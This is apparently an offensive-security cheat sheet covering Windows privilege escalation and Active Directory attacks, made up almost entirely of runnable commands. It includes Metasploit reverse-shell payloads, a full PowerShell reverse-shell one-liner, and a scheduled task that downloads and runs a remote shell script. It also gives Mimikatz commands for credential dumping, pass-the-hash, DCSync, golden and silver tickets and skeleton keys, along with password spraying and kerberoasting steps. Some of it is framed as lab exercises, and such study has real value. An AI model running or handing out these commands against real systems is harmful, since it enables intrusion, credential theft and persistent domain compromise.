Find-PathDLLHijack                  #   finds service %PATH% DLL hijacking opportunities
Write-HijackDll                     #   writes out a hijackable DLL

4. Registry Checks
Get-RegistryAlwaysInstallElevated   #   checks if the AlwaysInstallElevated registry key is set
Get-RegistryAutoLogon               #   checks for Autologon credentials in the registry
Get-ModifiableRegistryAutoRun       #   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

5. Miscellaneous Checks
Get-ModifiableScheduledTaskFile     #   find schtasks with modifiable target files
Get-UnattendedInstallFile           #   finds remaining unattended installation files
Get-Webconfig                       #   checks for any encrypted web.config strings
Get-ApplicationHost                 #   checks for encrypted application pool and virtual directory passwords
Get-SiteListPassword                #   retrieves the plaintext passwords for any found McAfee`'s SiteList.xml files
Get-CachedGPPPassword               #   checks for passwords in cached Group Policy Preferences files

6. Other Helpers/Meta-Functions
Get-ModifiablePath                  #   tokenizes an input string and returns the files in it the current user can modify
Get-CurrentUserTokenGroupSid        #   returns all SIDs that the current user is a part of, whether they are disabled or not
Add-ServiceDacl                     #   adds a Dacl field to a service object returned by Get-Service
Set-ServiceBinPath                  #   sets the binary path for a service to a specified value through Win32 API methods
Test-ServiceDaclPermission          #   tests one or more passed services or service names against a given permission set
Write-UserAddMSI                    #   write out a MSI installer that prompts for a user to be added

7. Check ALL
Invoke-AllChecks                    #   runs all current escalation checks and returns a report
AlwaysInstallElevated
DETECTION:
## On Windows Machine 

1. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2. From the output, notice that AlwaysInstallElevated value is 1 

1. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
2. From the output, notice that AlwaysInstallElevated value is 1

EXPLOITATION:
## With Meta-Sploit in Kali 

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows Machine.

## Back on the Windows Machine 

1. Place setup.msi in C:\Temp.
2. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
3. It is possible to confirm that the user was added to the local administrators group by 
typing the following in the command prompt: net localgroup administrators
Registry
DETECTION:
# Windows Machine

1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output suggests that user belong to NT AUTHORITY\INTERACTIVE has FullContol permission over the registry key.

EXPLOITATION:
# Windows Machine 

1. Copy C:\Users\User\Desktop\Tools\Source\windows_service.c to the Kali VM.

# Kali Machine

1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')
3. Copy the generated file x.exe, to the Windows VM.

# Windows Machine

1. Place x.exe in C:\Temp.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Exec Path
DETECTION:
# Windows Machine 

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the Everyone user group has FILE_ALL_ACCESS permission on the filepermservice.exe file.

EXPLOITATION:
# Windows Machine

1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Startup Applications
DETECTION:
# Windows Machine 

1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the BUILTIN\Users group has full access (F) to the directory.

EXPLOITATION:
# Kali Machine

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM. Windows VM
8. Place x.exe in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup.
9. Logoff.
10. Login with the administrator account credentials. Kali VM
11. Wait for a session to be created, it may take a few seconds.
12. In Meterpreter(meterpreter > prompt) type: getuid
13. From the output, notice the user is User-PC\Admin
DLL Hijacking
DETECTION:
# Windows Machine 

1. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
2. In reality, executables would be copied from the victims host over to the attackers host for analysis during run time. Alternatively, the same software can be installed on the attackers host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select Run as administrator from the menu.
3. In procmon, select "filter". From the left-most drop down menu, select Process Name.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads Process Name is dllhijackservice.exe then Include and click on the Add button, then Apply and lastly on OK.
6. Next, select from the left-most drop down menu Result.
7. In the input box on the same line type: NAME NOT FOUND
8. Make sure the line reads Result is NAME NOT FOUND then Include and click on the Add button, then Apply and lastly on OK.
9. Open command prompt and type: sc start dllsvc
10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute C:\Temp\hijackme.dll yet it could not do that as the file was not found. Note that C:\Temp is a writable location.

EXPLOITATION:
# Windows Machine 

1. Copy C:\Users\User\Desktop\Tools\Source\windows_dll.c to the Kali VM.

# Kali Machine 

1. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. Copy the generated file hijackme.dll, to the Windows VM. Windows VM
4. Place hijackme.dll in C:\Temp.
5. Open command prompt and type: sc stop dllsvc & sc start dllsvc
6. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
BinPath
DETECTION:
# Windows Machine 

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
2. Notice that the output suggests that the user User-PC\User has the SERVICE_CHANGE_CONFIG permission.

EXPLOITATION:
# Windows Machine 

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Unquoted Service Paths
DETECTION:
# Windows Machine 

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the BINARY_PATH_NAME field displays a path that is not confined between quotes.

EXPLOITATION:
# Kali Machine 

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

# Windows Machine 

1. Place common.exe in C:\Program Files\Unquoted Path Service.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
Hot-Potato
EXPLOITATION:
# Windows Machine 

1. In command prompt type: powershell.exe -nop -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators
Configuration Files
EXPLOITATION:
# Windows Machine 

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the "Password" property and copy the base64 string that is confined between the "Value" tags underneath it.

# Kali Machine 

1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password
Memory
EXPLOITATION:
# Kali Machine 

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3. In Metasploit (msf > prompt) type: set uripath x
4. In Metasploit (msf > prompt) type: run

# Windows Machine 

1. Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
2. Open command prompt and type: taskmgr
3. In Windows Task Manager, right-click on the iexplore.exe in the "Image Name" columnand select Create Dump File from the popup menu.
4. Copy the generated file, iexplore.DMP, to the Kali VM.

# Kali Machine 

1. Place 'iexplore.DMP' on the desktop.
2. Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3. Select the Copy the Base64 encoded string.
4. In command prompt type: echo -ne [Base64 String] | base64 -d
5. Notice the credentials in the output.

User Hunting

Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"

Find-LocalAdminAccess -Verbose

Invoke-UserHunter
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Stealth
Invoke-UserHunter -GroupName "RDPUsers"

# Monitor/Wait for incoming sessions
Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose

Invoke-EnumerateLocalAdmin -Verbose

. .\Find-WMILocalAdminAccess.ps1

. .\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

## Enter PSSession 

# Not Stateful
Enter-PSSession -ComputerName targetcomputer.target.domain.local
# Stateful
$sess = New-Pssession -ComputerName targetcomputer.target.domain.local
Enter-Pssession -session $sess

# CHECK POLICY AND BECAREFUL TO NOT LOCK ACCOUNTS
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

# Use this command to see the last password set of each user in the current domain

Get-UserProperty -Properties pwdlastset

Network Enumeration

#Ping Sweep Powershell script for Windows Machines
1..254 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}


# Ping Sweep Bash script for Linux machines
for i in $(seq 254); do ping 10.10.10.${i} -c1 -W1 & done | grep from

BloodHound

# Start up Neo4j First 

sudo neo4j start 

# Start Bloodhound Server 

Bloodhound

# Bloodhound Ingestors

# .Net from SharpsCollection 4.7_Any
.\SharpHound.exe -c All

Import-Module .\SharpHound.ps1
# Actual session
Invoke-BloodHound -CollectionMethod All -Verbose
# Actual session with more options
Invoke-Bloodhound -Verbose -Domain 'domain.local' -DomainController '172.16.0.1' -CollectionMethod all
# With Credential
Invoke-Bloodhound -Verbose -Domain 'domain.local' -DomainController 'DC01.domain.local' -LDAPUser 'targetuser' -LDAPPass 'targetpass' -CollectionMethod  all

# transfert your ZIP

Lateral Movement

# Powershell Remoting 

# Execute commands or scriptblocks
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)

# Execute scripts from files
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute locally loaded function on the remote machines
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList

# A function call within the script is used
Invoke-Command -Filepath C:\path\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# "Stateful" commands using Invoke-Command
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

# Dump credentials on a local machine
Invoke-Mimikatz -DumpCreds

# Dump credentials on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

# Over pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.domain.local /ntlm:<ntlmhash> /run:powershell.exe"'

# Invoke Mimikatz to create a token from user
$sess = New-PSSession -ComputerName target.domain.local
Enter-PSSession $sess
# EP BYPASS + AMSI BYPASS
exit
# PUSH LOCAL SCRIPT TO SESSION
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
# DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Port Forwarding

# RULE
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=10.10.10.10 connectport=8080
# CHECK
netsh interface portproxy show all
# RESET
netsh interface portproxy reset

Kerberos Double Hops

# LOGIN WITH COMPROMISED ACCOUNT
Invoke-Mimikatz -Command '"sekurlsa::pth /user:bob /domain:DOMAIN.LOCAL /ntlm:00000000000000000000000000000000 /run:powershell.exe"'

# PSREMOTE TO SERVER A
$servera = New-PSSession -ComputerName SERVERA.DOMAIN.LOCAL
Enter-PSSession -Session $servera

# PASS CREDENTIAL TO SERVER B
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
$serverb = New-PSSession -ComputerName SERVERB.DOMAIN.LOCAL -Credential $Cred

# LIST TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' klist} -Session $serverb | Select-String -Pattern Username

# DUMP TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' dump /user:targetadmin} -Session $serverb

# INJECT TICKET IN SERVER B:
Invoke-Command -ScriptBlock {& '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe'  ptt /ticket:B64 } -Session $serverb

# CHECK INJECTION:
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb

# RCE ON SERVER C:
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {hostname} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb

# FINAL REVERSE SHELL IN SERVER A FROM SERVER C
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient("servera",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb

Kerberoasting

.\Rubeus.exe kerberoast /stats 
.\Rubeus kerberoast /domain:DominionCyber.local /user:jnovoa /nowrap
.\SharpView.exe Get-DomainUser -SPN 

# Crack SPN's with Hashcat
hashcat.exe -m 13100 -a 0 hashes wordlist

Unconstrained Delegation

Constrained Delegation

DCSync

# DCSync feature for getting krbtgt hash

# Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
# Mimikatz Dump Account 
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01

Golden Tickets

# Golden ticket with Mimikatz 
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lab.domain.local /sid:S-1-5-x-x-x-x /krbtgt:00000000000000000000000000000000 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

# Golden Ticket with Rubeus 
Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

Golden Ticket Parameters

Invoke-Mimikatz -Command Explanation
kerberos::golden Name of the module
/User:Administrator Username of the user you want to impersonate
/domain:lab.domain.local Current Domain FQDN
/sid:S-1-5-x-x-x-x Current Domain SID
/krbtgt:00000000000000000000000000000000 RC4 of the current domain KRBTGT
/id:500 /groups:512 Optional User RID (default 500) and Group default 513 512 520 518 519)
/ptt or /ticket /ptt injects the ticket into the current process, /ticket saves the ticket for to a file for later
/startoffset:0 Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future
/endin:600 Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes
/renewmax:10080 Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800

Silver Tickets

# Silver Ticket with Rubeus 
Rubeus.exe silver /service:cifs/dc-local.domain.com /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:domain.com /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x /target:DC01.lab.domain.local /service:CIFS /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# Generate Silver ticket with machine account Hash - WMI abuse
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x /target:machine.target.local /service:HOST/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x /target:machine.target.local /service:RPCSS/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# Check WMI
Get-WmiObject -Class win32_operatingsystem -ComputerName machine.target.local

## Using a silver ticket for persistence
# Create a silver ticket for the HOST SPN which will allow us to schedule a task
Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x /target:DC01.lab.dmoain.local /service:HOST /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# CONFIGURE REMOTE TASK
schtasks /create /S DC01.lab.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Abuse01" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10/Invoke-PowerShellTcp.ps1''')'"
# EXEC REMOTE TASK
schtasks /Run /S DC01.lab.domain.local /TN "Abuse01"
Invoke-Mimikatz -Command Explanation
kerberos::golden Name of the module (there is no Silver module!)
/User:Administrator Username for which the TGT is generated
/domain:lab.domain.local Domain FQDN
/sid:S-1-5-x-x-x-x SID of the domain
/target:DC01.lab.domain.local Target server FQDN
/service:cifs The SPN name of service for which TGS is to be created
/rc4:00000000000000000000000000000000 NTLM (RC4) hash of the service account. Use /aes128 and /aes256 for using AES keys
/id:500 /groups:512 Optional User RID (default 500) and Group (default 513 512 520 518 519)
/ptt Injects the ticket in current PowerShell process - no need to save the ticket on disk
/startoffset:0 Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future
/endin:600 Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes
/renewmax:10080 Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800

Skeleton Keys

# REMOTE
$sess = New-PSSession DC01.domain.local
Enter-PSSession -Session $sess
# BYPASS AMSI AND EXIT
Invoke-Command -FilePath C:\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
# OR
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC01.lab.dmoain.local
# LOGIN
Enter-PSSession -Computername DC01 -credential domain\Administrator
# PASSWORD mimikatz

## Skeleton Key with lsass running as a protected process
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

#! needs the mimikatz driver (mimidriv.sys) on disk of the target DC !#

ADCS

NTLMRelay

AS-REPRoasting

References

https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet/tree/master/G%20-%20Lateral%20Movement